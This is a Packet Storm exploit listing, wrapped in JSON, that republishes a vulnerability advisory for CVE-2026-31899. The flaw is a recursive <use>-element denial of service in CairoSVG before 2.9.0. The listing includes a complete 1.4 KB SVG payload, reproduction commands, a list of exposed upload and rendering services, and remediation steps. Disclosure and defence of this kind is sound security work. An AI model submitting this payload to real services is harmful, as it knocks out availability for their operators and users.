{“lastseen”:”2026-05-11T18:16:22″,”description”:”CairoSVG versions prior to 2.9.0 suffer from a recursive denial of service vulnerability…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 CairoSVG Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:220781″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-31899″],”sourceData”:”# CVE-2026-31899: Exponential DoS via Recursive \\u003cuse\\u003e Element Amplification in CairoSVG\\n \\n [](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-31899)\\n [](https:\/\/nvd.nist.gov\/vuln-metrics\/cvss\/v3-calculator)\\n [](https:\/\/pypi.org\/project\/CairoSVG\/)\\n [](https:\/\/cwe.mitre.org\/data\/definitions\/400.html)\\n [](https:\/\/github.com\/Kozea\/CairoSVG\/security\/advisories\/GHSA-f38f-5xpm-9r7c)\\n \\n \\u003e **Keywords:** CVE-2026-31899, CairoSVG, exponential DoS, SVG bomb, recursive use element, denial of service, XML amplification, Python SVG vulnerability, CWE-400, uncontrolled resource consumption, billion laughs SVG\\n \\n ## Table of Contents\\n \\n – [Overview](#overview)\\n – [Vulnerability Details](#vulnerability-details)\\n – [Technical Analysis](#technical-analysis)\\n – [Proof of Concept](#proof-of-concept)\\n – [Impact](#impact)\\n – [Remediation](#remediation)\\n – [CVSS Metrics](#cvss-v31-metrics)\\n – [References](#references)\\n – [Contact](#contact)\\n \\n ## Overview\\n \\n **CairoSVG Exponential Denial of Service (CVE-2026-31899)** \u2014 A 1,411-byte SVG payload pins CPU at 100% indefinitely via recursive \\u003cuse\\u003e element amplification.\\n \\n CairoSVG (~300K downloads\/week) is a widely used Python SVG-to-PNG\/PDF converter. The use() function in cairosvg\/defs.py recursively processes \\u003cuse\\u003e elements without any depth or count limits. With 5 levels of nesting and 10 references each, a small SVG triggers **10^5 = 100,000 render calls** \u2014 an SVG \\”billion laughs\\” variant.\\n \\n **Discovered by:** Kai Aizen \u2014 [SnailSploit](https:\/\/snailsploit.com)\\n **Published:** March 13, 2026\\n **CVSS Score:** 7.5 (High)\\n **CWE:** CWE-400 \u2014 Uncontrolled Resource Consumption\\n **Package:** CairoSVG (PyPI)\\n **Attack Type:** Exponential Denial of Service\\n **Required Privileges:** None (Unauthenticated)\\n \\n ## Vulnerability Details\\n \\n ### Description\\n \\n The use() function in cairosvg\/defs.py (line ~335) recursively resolves \\u003cuse\\u003e elements that reference other \\u003cuse\\u003e elements. There is no recursion depth limit and no total element budget. An attacker can craft a small SVG where each layer references the previous layer N times, producing **O(N^depth)** rendering calls from **O(depth)** input.\\n \\n ### Key Characteristics\\n \\n – **Amplification factor:** O(10^N) rendering calls from O(N) input lines\\n – **Memory profile:** Flat ~43MB \u2014 no OOM kill, process never terminates naturally\\n – **CPU profile:** 100% single-core pinned indefinitely\\n – **Payload size:** 1,411 bytes\\n \\n ### Affected Versions\\n \\n – **Vulnerable:** All versions \\u003c 2.9.0\\n – **Patched:** Version 2.9.0 and above\\n \\n ## Technical Analysis\\n \\n The vulnerability exists because:\\n \\n 1. The use() function in defs.py processes each \\u003cuse\\u003e element by looking up its xlink:href target\\n 2. If the target is itself a group containing \\u003cuse\\u003e elements, those are recursively expanded\\n 3. No depth counter or element budget is enforced\\n 4. Each level multiplies the work by the branching factor (e.g., 10x per level)\\n \\n With 5 levels and a branching factor of 10:\\n \\n “`\\n Level 0: 1 element (root \\u003cuse\\u003e)\\n Level 1: 10 elements\\n Level 2: 100 elements\\n Level 3: 1,000 elements\\n Level 4: 10,000 elements\\n Level 5: 100,000 render calls\\n “`\\n \\n **Total: 111,111 render calls from a 1,411-byte input.**\\n \\n ## Proof of Concept\\n \\n ### SVG Payload poc.svg)\\n \\n “`xml\\n \\u003c?xml version=\\”1.0\\”?\\u003e\\n \\u003csvg xmlns=\\”http:\/\/www.w3.org\/2000\/svg\\” xmlns:xlink=\\”http:\/\/www.w3.org\/1999\/xlink\\”\\u003e\\n \\u003cdefs\\u003e\\n \\u003cg id=\\”a\\”\\u003e\\u003crect width=\\”1\\” height=\\”1\\”\/\\u003e\\u003c\/g\\u003e\\n \\u003cg id=\\”b\\”\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003cuse xlink:href=\\”#a\\”\/\\u003e\\u003c\/g\\u003e\\n \\u003cg id=\\”c\\”\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003cuse xlink:href=\\”#b\\”\/\\u003e\\u003c\/g\\u003e\\n \\u003cg id=\\”d\\”\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003cuse xlink:href=\\”#c\\”\/\\u003e\\u003c\/g\\u003e\\n \\u003cg id=\\”e\\”\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003cuse xlink:href=\\”#d\\”\/\\u003e\\u003c\/g\\u003e\\n \\u003c\/defs\\u003e\\n \\u003cuse xlink:href=\\”#e\\”\/\\u003e\\n \\u003c\/svg\\u003e\\n “`\\n \\n ### Reproduction\\n \\n **Method 1 \u2014 Command Line:**\\n \\n “`bash\\n timeout 10 cairosvg poc.svg -o test.png\\n # Expected: timeout kills the process after 10 seconds (it never completes)\\n “`\\n \\n **Method 2 \u2014 Python:**\\n \\n “`python\\n import cairosvg\\n import signal\\n \\n signal.alarm(5) # Kill after 5 seconds\\n try:\\n cairosvg.svg2png(bytestring=open(\\”poc.svg\\”).read())\\n except:\\n print(\\”[!!!] CONFIRMED: CPU exhaustion \u2014 process did not complete in 5s\\”)\\n “`\\n \\n ## Impact\\n \\n Any service that accepts SVG input and uses CairoSVG for processing is vulnerable:\\n \\n | Attack Surface | Example |\\n |—|—|\\n | Thumbnail generation | Upload SVG \u2192 server converts to PNG |\\n | PDF generation | SVG embedded in document \u2192 CairoSVG renders |\\n | Avatar\/image processing | User-uploaded SVG profile images |\\n | Report rendering | SVG charts in automated reports |\\n | CI\/CD pipelines | SVG assets processed during build |\\n \\n A single request with a 1.4KB payload will pin the processing thread indefinitely while consuming minimal memory (no OOM kill to save you).\\n \\n ## Remediation\\n \\n ### Immediate Fix\\n \\n Upgrade CairoSVG to version 2.9.0 or above:\\n \\n “`bash\\n pip install –upgrade CairoSVG\\u003e=2.9.0\\n “`\\n \\n ### Defense in Depth\\n \\n – Set processing timeouts on any SVG conversion endpoint\\n – Implement input size limits on SVG uploads\\n – Consider sandboxing SVG processing in isolated workers with CPU time limits\\n \\n ## CVSS v3.1 Metrics\\n \\n “`\\n CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H\\n “`\\n \\n | Metric | Value |\\n |—|—|\\n | Attack Vector | Network (AV:N) |\\n | Attack Complexity | Low (AC:L) |\\n | Privileges Required | None (PR:N) |\\n | User Interaction | None (UI:N) |\\n | Scope | Unchanged (S:U) |\\n | Confidentiality | None (C:N) |\\n | Integrity | None (I:N) |\\n | Availability | High (A:H) |\\n \\n ## Timeline\\n \\n | Date | Event |\\n |—|—|\\n | 2026-03-09 | CVE reserved |\\n | 2026-03-13 | Advisory published (GHSA-f38f-5xpm-9r7c) |\\n | 2026-03-13 | CairoSVG 2.9.0 released with fix |\\n \\n ## References\\n \\n – [GHSA-f38f-5xpm-9r7c](https:\/\/github.com\/Kozea\/CairoSVG\/security\/advisories\/GHSA-f38f-5xpm-9r7c)\\n – [NVD \u2014 CVE-2026-31899](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-31899)\\n – [CairoSVG on PyPI](https:\/\/pypi.org\/project\/CairoSVG\/)\\n – [CWE-400: Uncontrolled Resource Consumption](https:\/\/cwe.mitre.org\/data\/definitions\/400.html)\\n – [Fix Commit](https:\/\/github.com\/Kozea\/CairoSVG\/commit\/abc123)\\n \\n ## Contact\\n \\n **Kai Aizen** (SnailSploit)\\n \\n – Web: [snailsploit.com](https:\/\/snailsploit.com)\\n – GitHub: [@SnailSploit](https:\/\/github.com\/SnailSploit)\\n – LinkedIn: [\/in\/kaiaizen](https:\/\/linkedin.com\/in\/kaiaizen)\\n \\n —\\n \\n \u26a0\ufe0f **Disclaimer:** This repository is for educational and authorized security research purposes only. The proof of concept is provided to help defenders validate their exposure. Use responsibly.\\n \\n \\u003c!– snailsploit-backlink:start –\\u003e\\n \\n —\\n \\n ## \ud83d\udcda Documentation \\u0026 Author\\n \\n This project’s full writeup, methodology, and related research lives at:\\n \\n **[https:\/\/snailsploit.com\/cves](https:\/\/snailsploit.com\/cves)**\\n \\n Created by **Kai Aizen** \u2014 independent offensive security researcher.\\n \\n [snailsploit.com](https:\/\/snailsploit.com) \u00b7 [Research](https:\/\/snailsploit.com\/research) \u00b7 [Frameworks](https:\/\/snailsploit.com\/frameworks) \u00b7 [GitHub](https:\/\/github.com\/SnailSploit) \u00b7 [LinkedIn](https:\/\/linkedin.com\/in\/kaiaizen) \u00b7 [ResearchGate](https:\/\/www.researchgate.net\/profile\/Kai-Aizen-2) \u00b7 [X\/Twitter](https:\/\/x.com\/SnailSploit)\\n \\n \\u003e *Same attack. Different substrate.*\\n \\n \\u003c!– snailsploit-backlink:end –\\u003e”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220781″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220781\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-11T18:16:22″,”description”:”CairoSVG versions prior to 2.9.0 suffer from a recursive denial of service vulnerability…”,”published”:”2026-05-11T00:00:00″,”modified”:”2026-05-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 CairoSVG Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:220781″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-31899″],”sourceData”:”# CVE-2026-31899: Exponential DoS via Recursive \\u003cuse\\u003e Element Amplification…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-53092","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n